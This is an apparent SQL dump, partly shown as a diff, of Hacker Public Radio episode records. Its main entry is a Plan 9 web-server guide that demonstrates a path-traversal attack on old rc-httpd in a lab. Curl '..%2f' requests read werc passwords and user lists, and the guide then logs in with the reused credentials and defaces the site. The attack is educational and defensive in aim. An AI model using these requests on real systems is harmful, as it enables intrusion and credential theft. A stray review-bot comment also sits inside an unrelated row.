bootfile=9pc64\nnobootprompt=local!/dev/sdC0/fscache\nmouseport=ps2\nmonitor=vesa\nvgasize=1024x768x14\nuser=<ExampleUser>\ntiltscreen=none\nservice=cpu\n
\n

Add hostowner info to nvram

\n

Hostowner is similar to root but not quite. In our configuration, hostowner is close to being equivalent to a root user. The user= line in our bootprompt sets the hostowner.

\n

For automatic booting (aka not entering a password at the physical machine every time we power it in), we need to add the hostowner\'s key to nvram.

\n
term% nvram=/dev/sdF0/nvram auth/wrkey\nbad nvram des key\nbad authentication id\nbad authentication domain\nauthid: <ExampleUser>\nauthdom: cirno\nsecstore key: <press the return key if you do not want to type this at boot time>\npassword: <make it 8 chars>\n
\n

Configure auth server

\n

In order to connect to the system over the network, the new user must be added to the auth server.

\n
term% auth/keyfs\nterm% auth/changeuser <ExampleUser>\nPassword: <what you put earlier>\nConfirm password:\nAssign new Inferno/POP secret? [y/n]: n\nExpiration date (YYYYMMDD or never) [never]: never\nPost id:\nUser's full name:\nDepartment #:\nUser's email address:\nSponsor's email address:\nuser <ExampleUser> installed for Plan 9\n
\n

Configure permissions

\n

/lib/ndb/auth is similar to a /etc/sudoers. This configuration for the new user allows him to execute commands as other users except for the sys and adm users (but sys and adm are more like groups but who cares).

\n

append to /lib/ndb/auth

\n
hostid=<ExampleUser>\n    uid=!sys uid=!adm uid=*\n
\n

then reboot

\n

Test if it worked with drawterm

\n

The 9front version of drawterm must be used as it supports the better crypto in 9front. Other drawterm versions probably won\'t work.

\n
$ /opt/drawterm -u <ExampleUser> -h example.com -a example.com -r ~/\n
\n

Configure rc-httpd

\n

edit /rc/bin/rc-httpd/select-handler

\n

this file is something like /etc/httpd.conf on a UNIX system.

\n
#!/bin/rc\nPATH_INFO=$location\n\n        switch($SERVER_NAME) {\n        case example.com\n               FS_ROOT=/sys/www/$SERVER_NAME\n               exec static-or-index\n\n        case *\n              error 503\n}\n
\n

To listen on port 80 and run the handler on port 80:

\n
cpu% cp /rc/bin/service/!tcp80 /rc/bin/service/tcp80\ncpu% chmod +x /rc/bin/rc-httpd/select-handler\n
\n

Reboot and test.

\n

SSL

\n

I will never give money to the CA racket. Self-signed is the way to go on systems that don\'t support acme.sh, the only ACME client I use for obtaining free SSL certs.

\n

Generate and install:

\n
cpu% ramfs -p\ncpu% cd /tmp\ncpu% auth/rsagen -t 'service=tls role=client owner=*' > key\ncpu% chmod 600 key\ncpu% cp key /sys/lib/tls/key\ncpu% auth/rsa2x509 'C=US CN=example.com' /sys/lib/tls/key | auth/pemencode CERTIFICATE > /sys/lib/tls/cert\ncpu% mkdir /cfg/$sysname\ncpu% echo 'cat /sys/lib/tls/key >> /mnt/factotum/ctl' >> /cfg/$sysname/cpustart\n
\n

Now add a listener in /rc/bin/service/tcp443:

\n
#!/bin/rc\nexec tlssrv -c /sys/lib/tls/cert -l /sys/log/https /rc/bin/service/tcp80 $*\n
\n

And make it executable:

\n
cpu% chmod +x /rc/bin/service/tcp443\n
\n

Install and configure werc

\n
cpu% cd\ncpu% mkdir /sys/www && cd www\ncpu% hget http://werc.cat-v.org/download/werc-1.5.0.tar.gz  > werc-1.5.0.tgz\ncpu% tar xzf werc-1.5.0.tgz\ncpu% mv werc-1.5.0 werc\n\n# ONLY DO THIS IF YOU *MUST* RUN THE THINGS THAT ALLOW WERC TO WRITE TO DISK\n# EG. DIRDIR, BLAGH, ETC\n# DON'T DO THIS, JUST USE DRAWTERM OVER THE NETWORK\n# HTTP CLIENTS SHOULD NEVER BE ALLOWED TO WRITE TO DISK\n# PLEASE I BEG YOU\ncpu% cd .. && for (i in `{du www | awk '{print $2}'}) chmod 777 $i\n\ncpu% cd werc/sites/\ncpu% mkdir example.com\ncpu% mv default.cat-v.org example.com\n
\n

now re-edit /rc/bin/rc-httpd/select-handler

\n
#!/bin/rc\nWERC=/sys/www/werc\nPLAN9=/\nPATH_INFO=$location\nswitch($SERVER_NAME){\ncase cirno\n        FS_ROOT=$WERC/sites/$SERVER_NAME\n        exec static-or-cgi $WERC/bin/werc.rc\ncase *\n        error 503\n}\n
\n

Test the website. Werc is fiddly. Werc is archaic. Werc is fun.

\n
\n

Path traversal vulnerabilities in old versions of rc-httpd

\n

Using release COMMUNITY VS INFRASTRUCTURE, an old release with old rc-httpd, I have done the above steps. In current releases this bug no longer exists. Use current releases.

\n

The vulnerability

\n
# get list of werc admin users\n[root@localhost]# curl http://cirno/..%2f..%2f/etc/users/admin/members\npwn\n# get that werc user's password\n[root@localhost]# http://cirno/..%2f..%2f/etc/users/pwn/password\nsupersecret\n
\n

Wait, the passwords for werc are stored in plain text? Let\'s log in

\n
[root@localhost]# firefox http://cirno/_users/login\n
\n

Now let\'s see if any of the werc users are also system users:

\n
# let's enumerate users\n[root@localhost]# curl http://cirno/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users\n-1:adm:adm:glenda,pwn\n0:none::\n1:tor:tor:\n2:glenda:glenda:\n3:pwn:pwn:\n10000:sys::glenda,pwn\n10001:map:map:\n10002:doc::\n10003:upas:upas:glenda,pwn\n10004:font::\n10005:bootes:bootes:\n
\n

Let\'s hope that no one is re-using credentials. Let\'s check just to be sure

\n
$ PASS=supersecret /opt/drawterm -u pwn -h cirno -a cirno -G\ncpu% cat /env/sysname\ncirno\ncpu%\n
\n

This is what happens when you have path traversal vulnerabilities, an authentication vulnerability in your CMS, and share login/passwords

\n

How the static-or-cgi handler works

\n

rc-httpd calls various handler scripts that decide what to do with requests. In the example configuration for werc, rc-httpd is instructed to call the static-or-cgi script.

\n

I will compile these archaic rc scripts into pseudo code for the listener.

\n

The static-or-cgi handler (the handler specified in the httpd config) is simple:

\n
#!/bin/rc\ncgiargs=$*\n\nfn error{\n    if(~ $1 404)\n        exec cgi $cgiargs\n    if not\n        $rc_httpd_dir/handlers/error $1\n}\n\nif(~ $location */)\n    exec cgi $cgiargs\nif not\n    exec serve-static\n
\n
    \n
  1. If the requested file exists, call the cgi handler and pass it arguments.
  2. \n
  3. If the requested file does not exist, call the serve-static handler.
  4. \n
\n

How the serve-static handler works

\n

The problem lies in the serve-static handler:

\n
#!/bin/rc\nfull_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d}\nfull_path=$"full_path\nif(~ $full_path */)\n    error 503\nif(test -d $full_path){\n    redirect perm $"location^'/' \\\n        'URL not quite right, and browser did not accept redirect.'\n    exit\n}\nif(! test -e $full_path){\n    error 404\n    exit\n}\nif(! test -r $full_path){\n    error 503\n    exit\n}\ndo_log 200\nswitch($full_path){\ncase *.html *.htm\n        type=text/html\ncase *.css\n        type=text/css\ncase *.txt *.md\n        type=text/plain\ncase *.jpg *.jpeg\n        type=image/jpeg\ncase *.gif\n        type=image/gif\ncase *.png\n        type=image/png\ncase *\n        type=`{file -m $full_path}\n}\nif(~ $type text/*)\n    type=$type^'; charset=utf-8'\nmax_age=3600    # 1 hour\necho 'HTTP/1.1 200 OK'^$cr\nemit_extra_headers\necho 'Content-type: '^$type^$cr\necho 'Content-length: '^`{ls -l $full_path | awk '{print $6}'}^$cr\necho 'Cache-control: max-age='^$max_age^$cr\necho $cr\nexec cat $full_path\n
\n
    \n
  1. encode the full file path into a url
  2. \n
  3. if the url points to a file outside of \'*/\', the document root, error 503
  4. \n
  5. if the url is broken, exit
  6. \n
  7. if the url points to a file that neither exists nor is readable, error 503
  8. \n
  9. if you haven\'t exited by now, serve the file
  10. \n
\n

The problem is no sanitization. The script checks for files in the current directory BUT NOT BEFORE ENCODING THE URL STRING.

\n

The urlencode command works by decoding encoded characters.

\n
cpu% echo 'http://cirno/..%2f' | urlencode -d\nhttp://cirno/../\n
\n

Does ../ exist in */ ? the answer is yes.

\n

.. is a directory contained inside of */

\n

*/../ is the current working directory.

\n

How they fixed it

\n

Adding a sanitizer. By comparing the encoded url against an actual hypothetical file path and exiting if there is a mismatch, all %2f funny business is avoided.

\n
\n

Other (optional) bad config options in werc

\n

rc-httpd aside, a bad werc config can still lead to website defacement if your non rc-httpd webserver has a path traversal vulnerability.

\n

Additionally I have modified the DAC for /sys/www to allow werc, a child process of rc-httpd to write to disk. rc-httpd runs as the none user so it\'s not typically allowed to write to disk unless explicitly permitted. I do not allow this on my 9 webserver because it\'s the worst idea in the history of all time ever.

\n

I enabled the dirdir and blagh modules as if I were the type of admin who does a chmod -R 777 /var/www/htdocs because that\'s what the wordpress installation guide told me to do so I could have a cool and easy way to modify my website from the browser.

\n

Let\'s pretend that I\'m not the admin of this system and scrape the werc config just to see if the hypothetical badmin has these modules enabled.

\n
# get config\n[root@localhost]# curl http://cirno/..%2f..%2f/sites/cirno/_werc/config\nmasterSite=cirno\nsiteTitle='Werc Test Suite'\nconf_enable_wiki\nwiki_editor_groups admin\n
\n

Hmmm, looks like these modules are enabled so we can assume that httpd is allowed to write to disk. Let\'s modify cirno/index.md to warn the admin. As a funny joke. Totally not a crime under the Computer Fraud and Abuse Act. Totally not an inappropriate way to warn admins about a vulnerability.

\n
[root@localhost]# curl -s cirno | pandoc --from html --to plain\nquotes | docs | repo | golang | sam | man | acme | Glenda | 9times |\nharmful | 9P | cat-v.org\n\nRelated sites: | site updates | site map |\n\nWerc Test Suite\n\n-   › apps/\n-   › titles/\n\nSECURITY ADVISORY:\n\nlol this guy still hasn't figured out the ..%2f trick\n\nPowered by werc\n
\n

Modifying werc to support password hashing

\n

Adding password hashes isn\'t too difficult. Being constrained by time, I have not done this quite yet. Reading the source code, all it takes is modifying 2 werc scripts: bin/werclib.rc and bin/aux/addwuser.rc

\n
% echo 'supersecret' | sha1sum -2 512\n
\n
\n

Private namespaces to the rescue

\n

Luckily enough, the webserver runs as the none user with it\'s own namespace.

\n

Comparing the hostowner\'s namespace and none user\'s namespace

\n

I grab the namespace from the system console (ie not from drawterm) and from the listen command, then run a diff (unix style) to show the differences.

\n
cpu% ns | sort > cpu.ns\ncpu% ps -a | grep -e 'listen.*80' | grep -v grep\nnone            355    0:00   0:00      132K Open     listen [/net/tcp/2 tcp!*!80]\ncpu% ns 355 | sort > listen.ns\ncpu% diff -u listen.ns cpu.ns\n--- listen.ns\n+++ cpu.ns\n@@ -6,17 +6,29 @@\n bind  /amd64/bin /bin\n bind  /mnt /mnt\n bind  /mnt/exportfs /mnt/exportfs\n+bind  /mnt/temp/factotum /mnt/factotum\n bind  /n /n\n bind  /net /net\n bind  /root /root\n+bind -a '#$' /dev\n bind -a '#I' /net\n+bind -a '#P' /dev\n+bind -a '#S' /dev\n bind -a '#l' /net\n+bind -a '#r' /dev\n+bind -a '#t' /dev\n+bind -a '#u' /dev\n+bind -a '#u' /dev\n bind -a '#¤' /dev\n bind -a '#¶' /dev\n+bind -a '#σ/usb' /dev\n+bind -a '#σ/usbnet' /net\n bind -a /rc/bin /bin\n bind -a /root /\n+bind -b '#k' /dev\n bind -c '#e' /env\n bind -c '#s' /srv\n+bind -c /usr/pwn/tmp /tmp\n cd /usr/pwn\n mount -C '#s/boot' /n/other other\n mount -a '#s/boot' /\n@@ -26,4 +38,4 @@\n mount -a '#s/slashmnt' /mnt\n mount -a '#s/slashn' /n\n mount -aC '#s/boot' /root\n-mount -b '#s/factotum' /mnt\n+mount -b '#s/cons' /dev\n
\n

The major difference is that the hostowner (equivalent to root user) has a lot more things bound to his namespace:

\n\n

The listen process in question is fairly well isolated from the system. Minimal system damage can be caused by pwning a process owned by none.

\n
\n

Closing

\n

An argument could be maid that the rc-httpd vulnerability was \"not a bug\" because \"namespaces are supposed to segregate the system\".

\n

I disagree on this point. Namespaces are good and all but security is a multi-layer thing. Relying on a single security feature to save your system means relying on a single point of failure. Chroot escapes, namespace escapes, container escapes, and VM escapes are all things we need to be thinking about when writing software that touches the internet. Although unlikely, getting pwnd in spite of these security methods is still possible; all user input is dangerous and all user input that becomes remote code execution always results in privilege escalation no matter how secure you think your operating system is. Each additional layer of security makes it harder for attackers to get into the system.

\n

For example, when I write PHP applications, I consider things in this order:

\n
    \n
  1. don\'t pass unnecessary resources into the document root via symlinks, bind mounts, etc.
  2. \n
  3. never ever use system() in a context where user input can ever be passed to the function in order to avoid shell escapes
  4. \n
  5. sanitize all user input depending on context. Ex: if the PHP program is directly referencing files, make a whitelist and compare requests to this whitelist. If the PHP process is writing to a database, use prepared statements.
  6. \n
  7. fire up a kali linux vm and beat the test server half to death
  8. \n
  9. iterate upon my ignorance
  10. \n
  11. doubly verify DAC just to be sure
  12. \n
  13. re-check daemon configs to make sure I\'m not doing anything stupid
  14. \n
  15. FINALLY: rely on SELinux or OpenBSD chroots (depending on prod env) to save me if all else failed
  16. \n
\n

And of course the other things like firewalls (with whitelists for ports and blacklists for entire IP address blocks), key based ssh authentication, sshd configurations that don\'t make it possible to enumerate users, rate limiters, etc.

\n

Each layer of security is like a filter. If you have enough layers of filters it would take an unrealistic amount of force to push water through this filter. Although no system is perfectly safe from three letter agencies, a system with multiple layers of security is typically safe from drive-by attacks.

\n

Final exercise: intentionally write a php script that does path traversal. Run this on a system with SELinux. Try to coax /etc/passwd out of the server. Now try php-fpm instead of mod_php or vice-versa. You\'ll be surprised when even MAC doesn\'t protect your system.

\n

Even now, after spending almost a month and a half worth of after work hacker hours almost exclusively on 9, I enjoy it more than when I began and even more than when using it in semi-regular spurts in years past. The purpose of research operating systems is to perform research, be it about the design of the system otherwise. Where would we be without private namespaces? How can I use this idea in the real world? What would the world look like if we had real distributed computing instead of web browsers (which are the new dumb terminal)? Is there a use case for this in the real world? What can we learn from single layer security models? What can we do to improve the system?

\n

Plan 9 is perfect for this type of research. I\'m considering writing an httpd in C and a werc-like (minus the parts I don\'t like) in C and modifying the namespace for the listener so that I can run a webserver on 9 without pulling in /bin in order to reduce the possibility of a shell escape.

\n

I think that in order to improve ourselves, we must be critical of ourselves. We must be critical of the things we enjoy in order to improve them and learn something new in the process. For software especially, there is no such thing as perfection, only least bad. And my final thought:

\n
\n

Criticism: This program/OS/whatever sucks

\n
\n
\n

Response: I know, help me fix it.

\n
\n',406,0,1,'CC-BY-SA','Plan 9, private namespaces, security, research operating systems',0,0,1), (3695,'2022-09-30','How I watch youtube with newsboat',663,'Using youtube\'s channel RSS feeds to watch youtube from the command line','

How I watch youtube with newsboat

\n

I find that the youtube web ui is designed to keep users on the site by feeding them an unending stream of information. Bright colors, distracting thumbnails, peanut galleries, etc. I prefer to consume my videos in the same way I consume everything else: via RSS.

\n

RSS is my favorite way of aggregating things that other people have made because it allows me, the user, to interact with their things

\n

The only dependencies not on a standard UNIX system are newsboat and a video player. I also use yt-dlp to download videos for later viewing. I like mpv but you can substitute your own.

\n
$ sudo $pkgmrg install newsboat mpv yt-dlp
\n

Getting RSS feeds from youtube

\n

Youtube (currently) provides RSS feeds for channels.

\n

Finding Youtube channel ID

\n

Sometimes channels have vanity URLs that can make it difficult to find the channel ID. Other times, the URL contains the channel ID. All youtube channel IDs start with the string UC so we can easily grep for them.

\n
$ curl https://www.youtube.com/c/RMCRetro | grep --color "href=\\"https://www.youtube.com/channel/UC\\""\n[ lots of nonsense ]\nhref="https://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w"\n[ lots of nonsense ]
\n

In order to turn this channel ID into something useful, we create the following URL:

\n
https://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w
\n

Google takeout can also be used to export youtube subscriptions.

\n

The export format is a CSV that contains the channel IDs for all of our subscriptions.

\n
Channel Id,Channel Url,Channel Title\nUCLEoyoOKZK0idGqSc6Pi23w,http://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w,RMC - The Cave
\n

Newsboat url list

\n

Newsboat reads it’s list of URLs from ~/.config/newsboat/urls. Every url we add to this list will be automaticlly fetched. You can make separate URL lists for your list of videos and list of standard text based RSS feeds

\n

If you have an exported CSV, you can easily modify it so that newsboat will accept it as a list of URLs by deleting row 1, column 1+comma, and replacing the comma between the URL and channel name with a tab character. Doing a sed \'s/channel\\//feeds\\/videos.xml?channel_id=/g\' on the file is an easy way to replace the website URL with the feed url. Newsboat only reads the first field of every row so the channel name can be kept for easier subscription management.

\n
http://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w     RMC - The Cave
\n

Newsboat config

\n

In order to play videos, we need to add some macros to the newsboat config file at ~/.config/newsboat/config

\n

Mine looks like this.

\n
# load URLS on launch\nauto-reload  yes\n\n# vim binds\nbind-key j down\nbind-key k up\nbind-key j next articlelist\nbind-key k prev articlelist\nbind-key J next-feed articlelist\nbind-key K prev-feed articlelist\nbind-key G end\nbind-key g home\nbind-key d pagedown\nbind-key u pageup\nbind-key l open\nbind-key h quit\nbind-key a toggle-article-read\nbind-key n next-unread\nbind-key N prev-unread\nbind-key D pb-download\nbind-key U bashow-urls\nbind-key x pb-delete\n\n# macro setup\nbrowser linkhandler\nmacro , open-in-browser\n\n# launch video player\nmacro v set browser "setsid -f mpv" ; open-in-browser ; set browser linkhandler\n\n# download video\nmacro d set browser "yt-dlp"; open-in-browser ; set browser linkhandler\n\n# download audio only\nmacro a set browser "yt-dlp --embed-metadata -xic -f bestaudio/best" ; open-in-browser ; set browser linkhandler
\n

Video demo

\n

This is a demo of using newsboat with videos. In order to execute the macros, you type , then v or whatever other letter you set the macro to.

\n

video in webm format your web browser or operating system does not support free video codecs :(

\n

A url list to get you started

\n
https://www.youtube.com/feeds/videos.xml?channel_id=UC3ts8coMP645hZw9JSD3pqQ        Andreas Kling\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC9-y-6csu5WGm29I7JiwpnA        Computerphile\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC15BJjhPr4d5gTClhmC4HRw        Elliot Coll\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCxQKHvKbmSzGMvUrVtJYnUA        Learn Linux TV\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCm9K6rby98W8JigLoZOh6FQ        LockPickingLawyer\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCl2mFZoRqjw_ELax4Yisf6w        Louis Rossmann\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC2eYFnH61tmytImy1mTYvhA        Luke Smith\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC7YOGHUfC1Tb6E4pudI9STA        Mental Outlaw\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCjFaPUcJU1vwk193mnW_w1w        Modern Vintage Gamer\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w        RMC - The Cave\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC4rqhyiTs7XyuODcECvuiiQ        Scott The Woz\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC5I2hjZYiW9gZPVkvzM8_Cw        Techmoan\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCy0tKL1T7wFoYcxCe0xjN6Q        Technology Connections\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC8uT9cgJorJPWu7ITLGo9Ww        The 8-Bit Guy\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC5UAwBUum7CPN5buc-_N1Fw        The Linux Experiment\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCFMx-JitepTttWc-ABHhu8A        This Week in Retro\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCsnGwSIHyoYN0kiINAGUKxg        Wolfgang's Channel\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCJ8V9aiz50m6NVn0ix5v8RQ        decino                
\n',406,0,1,'CC-BY-SA','newsboat, RSS, youtube',0,0,1), -(3956,'2023-10-02','HPR Community News for September 2023',0,'HPR Volunteers talk about shows released and comments posted in September 2023','',159,47,1,'CC-BY-SA','Community News',0,0,1), +(3956,'2023-10-02','HPR Community News for September 2023',0,'HPR Volunteers talk about shows released and comments posted in September 2023','\n\n

New hosts

\n

\nWelcome to our new host:
\n\n Noodlez.\n

\n\n

Last Month\'s Shows

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
IdDayDateTitleHost
3935Fri2023-09-01Server build retrospectiveDaniel Persson
3936Mon2023-09-04HPR Community News for August 2023HPR Volunteers
3937Tue2023-09-05Adventures in Pi-HoleNoodlez
3938Wed2023-09-06An open directory of web audio streamdnt
3939Thu2023-09-07How I got into tech and hackingTrixter
3940Fri2023-09-08Equipment MaintenanceAhuka
3941Mon2023-09-11Interview with Yosef Kerzneroperat0r
3942Tue2023-09-12RE: How to make friends.Some Guy On The Internet
3943Wed2023-09-13Why my Dell does it better on Linux.knightwise
3944Thu2023-09-14Race for the Galaxytuturto
3945Fri2023-09-15My chrome pluginsDaniel Persson
3946Mon2023-09-18Planning for a planner, part 02.Some Guy On The Internet
3947Tue2023-09-19Archiving Floppy DisksSteve Saner
3949Thu2023-09-21How I use virtualisation to tame my Social Media addiction.knightwise
3950Fri2023-09-22Sid Meiers\' Alpha CentauriAhuka
3951Mon2023-09-25Cell Phone Screen Protectorsoperat0r
3955Fri2023-09-29airgradient measurement stationDaniel Persson
\n\n

Comments this month

\n\n\nThere were no comments this month.\n\n

Mailing List discussions

\n

\nPolicy decisions surrounding HPR are taken by the community as a whole. This\ndiscussion takes place on the Mail List which is open to all HPR listeners and\ncontributors. The discussions are open and available on the HPR server under\nMailman.\n

\n

The threaded discussions this month can be found here:

\nhttps://lists.hackerpublicradio.com/pipermail/hpr/2023-September/thread.html\n\n\n

Events Calendar

\n

With the kind permission of LWN.net we are linking to\nThe LWN.net Community Calendar.

\n

Quoting the site:

\n
This is the LWN.net community event calendar, where we track\nevents of interest to people using and developing Linux and free software.\nClicking on individual events will take you to the appropriate web\npage.
\n\n

Any other business

\n\n\n\n',159,47,1,'CC-BY-SA','Community News',0,0,1), (3691,'2022-09-26','Starship.rs the best prompt I don\'t use',1529,'Bash prompts','

Here\'s the snippets I use in my .bashrc file.

\n\n
RED='\033[0;31m'\nPLAIN='\033[0m' # No Color\nWHITE='\e[97m'\nGREEN='\e[0;32m'\nPURPLE='\e[35;35m'\nCYAN='\e[36;36m'\n\nJAVA_VERSION=`java --version | head -1 | cut -f2 -d' '`\n\nIP=$(hostname -I | awk '{print $1;}' )\nsource /usr/doc/git-2.35.1/contrib/completion/git-prompt.sh\nPS1='\! [\['$GREEN'\]$(hostname -s) $IP\['$PLAIN'\]] [\['$CYAN'\]$(pwd -P)\['$PLAIN'\]] $(__git_ps1 "[\['$PURPLE'\] %s\['$PLAIN'\]]")[☕ '$JAVA_VERSION']\n\['$GREEN'\]$\['$PLAIN'\] '
\n',78,0,0,'CC-BY-SA','bash,ps1,terminal,linux',0,0,1), (3698,'2022-10-05','Spectrogram',949,'Edit audio as a spectrogram','

Here\'s a view of my voice. The bright spots at the bottom of the image are my voice, and the bright burst at the top is a click caused by saliva.

\n\n

Here\'s me inhaling. Notice how sparse this is compared to my voice.

\n\n

One thing I fail to mention in the episode is that there are network monitors that render network activity as a spectrogram, too. If you don\'t have a Wi-Spy, it\'s worth looking at.

\n',78,0,0,'CC-BY-SA','audio',0,0,1), (3726,'2022-11-14','Breaches ever reaching',251,'A short episode about the reaching effects of breaches and forgotten accounts','

A short episode about the reaching effects of breaches and accounts you may have forgotten about.

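Review bot: the added notes for row 3956 are a snapshot that will be stale by release. The "Last Month's Shows" table runs through 3955 (2023-09-29) but has no rows for 3948, 3952, 3953 or 3954 (the 2023-09-20 and 2023-09-26 to 2023-09-28 weekday slots), and the "Comments this month" block hard-codes "There were no comments this month." If this HTML comes from the community-news generator, regenerate it at month end instead of committing it now; if it is hand-written, add the missing rows and re-check comments before the 2023-10-02 release. One data fix in the same table: the 3950 title is stored as `Sid Meiers\' Alpha Centauri` (apostrophe after the s) where the game is "Sid Meier's Alpha Centauri"; correct it on the source row for 3950 so the regenerated table picks it up rather than patching the copy here.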
\n\n',405,74,1,'CC-BY-SA','cybersecurity,security,EvilSteve,breach,data reduction,privacy',0,0,1), @@ -20208,13 +20208,13 @@ INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hosti (3896,'2023-07-10','The Brochs of Glenelg',782,'A verbal tour in situ of one of the two brochs of Glenelg','In this episode I visit one of the best preserved brochs on the Scottish mainland called Dun Telve. It is one of two that are a few miles outside the village of Glenelg which is rare itself in that its name is a palindrome.\n\n

\"The

\n\n

\"The

\n',268,101,0,'CC-BY-SA','history,scotland,prehistoric',0,0,1), (3895,'2023-07-07','What\'s in my backpack',514,'Stache walks through the contents of his work backpack','

I have many things in my work backpack, to include a Raspberry Pico,\nmultiple USB drives, USB cables, two laptops, my glasses and a\nsunglasses case attached to the outside.

\n

It is a 5.11 RUSH MOAB 10 Sling Pack 18L, not because I want to be\n\"tacticool\" but because I like their products, and that they support\nveterans like myself.

\n',408,23,0,'CC-BY-SA','backpack contents, toolkit',0,0,1), (3897,'2023-07-11','HPR AudioBook Club 22 - Murder at Avedon Hill',6119,'In this episode the HPR Audiobook Club discusses \"Murder at Avedon Hill\" by P.G. Holyfield','In\nthis episode the HPR Audiobook Club discusses the audiobook Murder\nat Avedon Hill by P.G. Holyfield\n
\n

Non-Spoiler Thoughts

\n
\n
    \n
  • Great reading, great audio quality, fun setting and setup. It had\nthe feel of a role playing adventure at the beginning, but was well\nfleshed out by the middle. It would have been slightly better if all of\nthe guest voices had had a pronunciation guide for the names.
  • \n
\n

Beverage Reviews

\n
\n
    \n
  • Thaj: A delicious regular chocolate malt from the\nlocal ice cream shop \"The Comfy Cow\"
  • \n
  • x1101: Barton\'s 1795
  • \n
  • Pokey Leinenkugel\'s: I have a fall variety pack,\nbut this is not the fall. I\'m not enjoying this beer as much as I\nexpected. It\'s good, and I can taste the high quality of the\ningredients, but I think it\'s just the wrong season for this.
  • \n
\n

Things We Talked About

\n
\n\n

Our Next Audiobook

\n
\n

A\nPrincess of Mars by Edgar Rice Burroughs

\n

The Next Audiobook Club\nRecording

\n
\n

Right now we are working through a backlog of older episodes that\nhave already been recorded. Once that ends we fully anticipate recording\nnew episodes with listener participation.

\n

Feedback

\n
\n

Thank you very much for listening to this episode of the HPR\nAudioBookClub. We had a great time recording this show, and we hope you\nenjoyed it as well. We also hope you\'ll consider joining us next time we\nrecord a new episode. Please leave a few words in the episode\'s comment\nsection.

\n

As always; remember to visit the HPR contribution page HPR could\nreally use your help right now.

\n

Sincerely, The HPR Audiobook Club

\n

P.S. Some people really like finding mistakes. For their enjoyment,\nwe always include a few.

\n

Our Audio

\n
\n

This episode was processed using Audacity. We\'ve been making\nsmall adjustments to our audio mix each month in order to get the best\npossible sound. Its been especially challenging getting all of our\nvoices relatively level, because everyone has their own unique setup.\nMumble is great for bringing us all together, and for recording, but\nit\'s not good at making everyone\'s voice the same volume. We\'re pretty\nhappy with the way this month\'s show turned out, so we\'d like to share\nour editing process and settings with you and our future selves (who, of\ncourse, will have forgotten all this by then).

\n

We use the \"Truncate Silence\" effect with it\'s default settings to\nminimize the silence between people speaking. When used with it\'s\ndefault (or at least reasonable) settings, Truncate Silence is extremely\neffective and satisfying. It makes everyone sound smarter, it makes the\nfile shorter without destroying actual content, and it makes a\nconversations sound as easy and fluid during playback as it was while it\nwas recorded. It can be even more effective if you can train yourself to\nremain silent instead of saying \"uuuuummmm.\" Just remember to ONLY pass\nthe file through Truncate Silence ONCE. If you pass it through a second\ntime, or if you set it too aggressively your audio may sound sped up and\nchoppy.

\n

Next we use the \"Compressor\" effect with the following settings:

\n
Threshold: -30db\n\nNoise Floor: -50db\n\nRatio: 3:1\n\nAttack Time: 0.2sec\n\nDecay Time: 1.0 sec`
\n

\"Make-up Gain for 0db after compressing\" and \"compress based on\npeaks\" were both left un-checked.

\n

After compressing the audio we cut any pre-show and post-show chatter\nfrom the file and save them in a separate file for possible use as\nouttakes after the closing music.

\n

We adjust the Gain so that the VU meter in Audacity hovers around\n-12db while people are speaking, and we try to keep the peaks under\n-6db, and we adjust the Gain on each of the new tracks so that all\nvolumes are similar, and more importantly comfortable. Once this is done\nwe can \"Mix and Render\" all of our tracks into a single track for export\nto the .FLAC file which is uploaded to the HPR server.

\n

At this point we listen back to the whole file and we work on the\nshownotes. This is when we can cut out anything that needs to be cut,\nand we can also make sure that we put any links in the shownotes that\nwere talked about during the recording of the show. We finish the\nshownotes before exporting the .aup file to .FLAC so that we can paste a\ncopy of the shownotes into the audio file\'s metadata.

\n

At this point we add new, empty audio tracks into which we paste the\nintro, outro and possibly outtakes, and we rename each track\naccordingly.

\n

Remember to save often when using Audacity. We like to save after\neach of these steps. Audacity has a reputation for being \"crashy\" but if\nyou remember save after every major transform, you will wonder how it\never got that reputation.

\n',157,53,1,'CC-BY-SA','Audiobook club, audiobook, fantasy, fiction',0,0,1), -(3907,'2023-07-25','My introduction show',1153,'About me and computers','

The show notes

\n\n',421,0,0,'CC-BY-SA','introduction,solocast',0,0,1), -(3899,'2023-07-13','Repair corrupt video files for free with untruc',320,'This is how I fixed corrupt video files from my dash cam after an accident','

My original blog post on this topic: https://pquirk.com/posts/corruptvideo/

\n
    \n
  • Untruc at Github: https://github.com/anthwlock/untrunc
  • \n
  • Windows version: https://github.com/anthwlock/untrunc/releases
  • \n
  • Arch linux version: https://aur.archlinux.org/packages/untrunc-git
  • \n
\n

Make your donations to:
\nhttps://www.paypal.com/paypalme/anthwlock
\nhttps://vcg.isti.cnr.it/~ponchio/untrunc.php

